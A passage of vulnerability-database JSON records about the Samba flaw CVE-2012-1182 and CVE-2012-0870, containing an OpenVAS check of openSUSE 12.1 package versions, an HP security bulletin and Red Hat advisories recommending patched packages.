"published": "2012-12-13T00:00:00", "type": "openvas", "title": "SuSE Update for update openSUSE-SU-2012:0507-1 (update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182", "CVE-2012-0870"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:850203", "href": "http://plugins.openvas.org/nasl.php?oid=850203", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0507_1.nasl 8336 2018-01-09 07:01:48Z teissa $\n#\n# SuSE Update for update openSUSE-SU-2012:0507-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"- Add the ldapsmb sources as else patches against them have\n no chance to apply.\n\n - Samba pre-3.6.4 are affected by a vulnerability that\n allows remote code exe- cution as the "root" user; PIDL\n based autogenerated code allows overwriting beyond of\n allocated array; CVE-2012-1182; (bso#8815); (bnc#752797).\n\n - s3-winbindd: Only use SamLogonEx when we can get\n unencrypted session keys; (bso#8599).\n - Correctly handle DENY ACEs when privileges apply;\n (bso#8797).\n\n - s3:smb2_server: fix a logic error, we should sign non\n guest sessions; (bso8749).\n - Allow vfs_aio_pthread to build as a static module;\n (bso#8723).\n - s3:dbwrap_ctdb: return the number of records in\n db_ctdb_traverse() for persistent dbs; (#bso8527).\n - s3: segfault in dom_sid_compare(bso#8567).\n - Honor SeTakeOwnershiPrivilege when client asks for\n SEC_STD_WRITE_OWNER; (bso#8768).\n - s3-winbindd: Close netlogon connection if the status\n returned by the NetrSamLogonEx call is timeout in the\n pam_auth_crap path; (bso#8771).\n - s3-winbindd: set the can_do_validation6 also for trusted\n domain; (bso#8599).\n - Fix problem when calculating the share security mask,\n take priviliges into account for the connecting user;\n (bso#8784).\n\n - Fix crash in dcerpc_lsa_lookup_sids_noalloc() with over\n 1000 groups; (bso#8807); (bnc#751454).\n\n - Remove obsoleted Authors lines from spec file for\n post-11.2 systems.\n\n - Make ldapsmb build with Fedora 15 and 16; (bso#8783).\n - BuildRequire libuuid-devel for post-11.0 and other\n systems.\n - Define missing python macros for non SUSE systems.\n - PreReq to fillup_prereq and insserv_prereq only on SUSE\n systems.\n - Always use cifstab instead of smbfstab on non SUSE\n systems.\n\n - Ensure AndX offsets are increasing strictly monotonically\n in pre-3.4 versions; CVE-2012-0870; (bnc#747934).\n\n - Add SERVERID_UNIQUE_ID_NOT_TO_VERIFY; (bso#8760);\n (bnc#741854).\n\n - s3-printing: fix crash in printer_list_set_printer();\n (bso#8762); (bnc#746825).\";\n\ntag_affected = \"update on openSUSE 12.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850203);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:59 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0870\", \"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0507_1\");\n script_name(\"SuSE Update for update openSUSE-SU-2012:0507-1 (update)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "description": "No description provided", "edition": 1, "cvss3": {}, "published": "2012-06-17T00:00:00", "title": "HP Server Automation code execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:VULN:12426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12426", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "description": "Array index overflow on RPC request processing.", "edition": 1, "cvss3": {}, "published": "2012-04-19T00:00:00", "title": "Samba array index overflow", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-19T00:00:00", "id": "SECURITYVULNS:VULN:12328", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12328", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03366886\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03366886\r\nVersion: 1\r\n\r\nHPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-06-11\r\nLast Updated: 2012-06-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Server\r\nAutomation for Linux and SunOS. This vulnerability could by exploited\r\nremotely resulting in the execution of arbitrary code. The vulnerability is\r\nin Samba which is used in HP Server Automation.\r\n\r\nReferences: CVE-2012-1182\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Server Automation v7.8x, v9.0x, v9.1x on RedHat Linux, Suse Linux, and\r\nSunOS\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-1182 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Server Automation Patch SRVA_00127.tar.gz to resolve this\r\nissue. The patch is available on HP's SSO here:\r\nhttp://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_SRVA_00127\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 11 June 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/V+3oACgkQ4B86/C0qfVnNIwCdHLlLQQANRVn3NY7HPMQvo5Y0\r\n3AgAoI1Jvj4NXs1QOB0oshhDlFuDsizm\r\n=3sLX\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2012-06-17T00:00:00", "title": "[security bulletin] HPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of Arbitrary Code", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28165", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-21T04:45:40", "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "redhat", "title": "(RHSA-2012:0466) Critical: samba3x security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2017-09-08T07:50:23", "id": "RHSA-2012:0466", "href": "https://access.redhat.com/errata/RHSA-2012:0466", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:40:48", "description": "The openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2013:0515) Moderate: openchange security, bug fix and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 